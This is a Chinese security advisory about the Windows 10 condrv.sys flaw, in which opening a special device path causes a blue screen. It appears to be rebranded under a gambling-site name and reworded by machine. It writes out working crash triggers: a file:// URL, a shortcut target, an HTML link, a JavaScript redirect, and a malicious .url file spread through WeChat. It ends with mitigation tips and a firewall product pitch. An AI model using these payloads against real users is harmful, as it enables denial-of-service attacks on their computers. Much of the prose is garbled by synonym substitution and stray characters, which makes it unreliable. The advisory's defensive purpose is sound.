iSlot官方网站

无线新履历  ,不变如磐石 丨 高校关键场景高密无线优良实际分享会
date
预约直播
从此  ,无线可“磐石" 丨 iSlot官方网站磐石无线解决规划场景颁布会
date
预约直播
iSlot官方网站 - 引领潮水
产品
< 返回主菜单
产品中心
产品
解决规划
< 返回主菜单
解决规划中心
行业
合作同伴
返回主菜单
选择区域/说话
iSlot官方网站 - 引领潮水

您订阅的产品有更新  ,请实时查阅

查看详情

安全应急|幼心一个链接让你的系统蓝屏!

iSlot官方网站 - 引领潮水 颁布功夫:2021-01-25
iSlot官方网站 - 引领潮水

近日  ,iSlot官方网站网络CERT安全应急响应团队追踪到一则Windows 10 condrv.sys存在内存败坏缝隙的信息  ,该缝隙直接导致Win10系统蓝屏。该缝隙是由于Windows 10中condrv驱动设置谬误导致的。 当Chrome 或Edge浏览器在打开特定链接时  ,刚好挪用了该驱动的相应函数  ,而IE没有挪用  ,因而IE不会受影响。另表  ,攻击者可能直接机关恶意代码直接挪用存在缝隙的函数  ,若是用户点击就会触发缝隙、导致蓝屏。

 

利用大局

 
 

接见链接\\.\globalroot\device\condrv\kernelconnect会触发蓝屏。

 

触发步骤

 
  • 用浏览器接见:

file://\\.\globalroot\device\condrv\kernelconnect

  • 用一个快捷方式指向:

\\.\globalroot\device\condrv\kernelconnect

  • 网页攻击:

 

例如a标签

<a href="file://\\.\globalroot\device\condrv\kernelconnect"></a>

<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>

 

以及JavaScript剧本。

 

  •  微信群恶意用户传布名为test.url文件,在微信开启自动下载职能后文件被接管导致电脑即蓝屏

     

 

 

  1. 接见该文件夹即蓝屏(url文件会自动要求文件图标而加载\\.\gxxx

  2. 点击打开即蓝屏,文件内默认URL为\\.\gxxx

  3. 电脑微信打开即蓝屏,电脑微信默认使用了微信当前目录下wechatweb.exe文件对Web内容进行加载,而该exe主题则是由QQ浏览器演变而来,而QQ浏览器内核又是选取的chrome内核,所以微信端打开即蓝屏

 

影响领域

 
 

目前受影响的操作系统版本:Windows 10.1709及以上系统

 

 

处置规划

 
 

官方建复建议

 

该缝隙当前暂无官方解决规划。

 

产品当前官方暂未颁布受影响版本的对应补丁  ,建议受影响的用户实时关注更新官方的安全补。ㄊ凳备律兜阶钚掳姹荆。链接如下:

https://www.microsoft.com/zh-cn/software-download/windows10

 

iSlot官方网站网络建复建议

 

产品

注明

RG-WALL系列下一代防火墙

下一代防火墙结合防病毒以及威胁谍报检测。在安全能力上  ,不仅支持NATACLDDoS防御等传统安全职能  ,也支持丰硕的利用级安全职能  ,蕴含病毒查杀、入侵检测、APP检测、文件过滤、恶意URL过滤等。提供多维度的利用层监控与分析  ,援手用户把握风险  ,精准预警。

RG-IDP系列入侵检测防御系统

是iSlot官方网站网络推出的将深度内容检测、安全防护、上网行为治理等技术结合的入侵检测防御系统设备。通过对网络中深层攻击行为进行正确的分析判断  ,自动有效的;ね绨踩。共同实时更新的入侵攻击特点库  ,可检测防护3500种以上的网络攻击行为  ,蕴含DoS/DDoS、病毒、蠕虫、僵尸网络、木马、可疑代码、探测与扫描等各类网络威胁。

 

安全建议

 

  • 不要打开陌生网页  ,若是不用要建议不容JavaScript。

  • 不要打开陌生法式  ,终端装置防护软件。

  • 不要轻易下载装置起源不明的软件  ,预防有人恶意利用此缝隙造成回绝服务攻击。

  • 对不明来历的邮件、office等提高警惕。

  • 警惕不明来历压缩文件  ,为了让受害者下载Windows快捷方式(.url)文件。攻击者会通过糊弄用户下载ZIP归档文件  ,并将恶意字符串暗藏其中;当用户解压ZIP文件时便会触发攻击。

  • 实时备份沉要文件  ,以免文件迷失。

 

团队介绍

 

iSlot官方网站网络CERT安全应急响应团队  ,跟踪最新互联网威胁事务  ,针对最新安全缝隙  ,APT攻击以及僵尸网络家族做实时跟踪和分析;为产品、客户提供实时、有效的安全防护战术与解决规划。

 

iSlot官方网站 - 引领潮水

 

iSlot官方网站“网络+安全”主张将网络设备的安全能力充分阐扬  ,网络设备、安全设备与安全平台智能联动  ,握别安全孤岛  ,组成整网联动的安全保险系统  ,实现防护、安全预测、分析和响应等安全问题自动化全流程关环。

 

iSlot官方网站 - 引领潮水

 

如您必要iSlot官方网站安全  ,请留下您的联系方式

关注iSlot官方网站
gfwx_logo
关注iSlot官方网站官网微信
随时相识公司最新动态
iSlot官方网站 - 引领潮水

返回顶部

收起
iSlot官方网站 - 引领潮水 文档AI副手
iSlot官方网站 - 引领潮水 文档评价
ev-close ev-close-m
该资料是否解决了您的问题?
ev-close ev-close-m
您对当前页面的中意度若何?
不咋滴
极度好
dark-star dark-star dark-star dark-star dark-star
ev-close ev-close-m
您中意的原因是(多。?
您对文档是否还有其它的问题或建议?
为尽快解决问题  ,请您留下联系方式以便回复
邮箱
手机号
ev-bg
感激您的反。
iSlot官方网站 - 引领潮水
iSlot官方网站 - 引领潮水
iSlot官方网站 - 引领潮水
请选择服务项目
关关征询页
售前征询 售前征询
售前征询
售后服务 售后服务
售后服务
定见反馈 定见反馈
定见反馈
更多联系方式
【网站地图】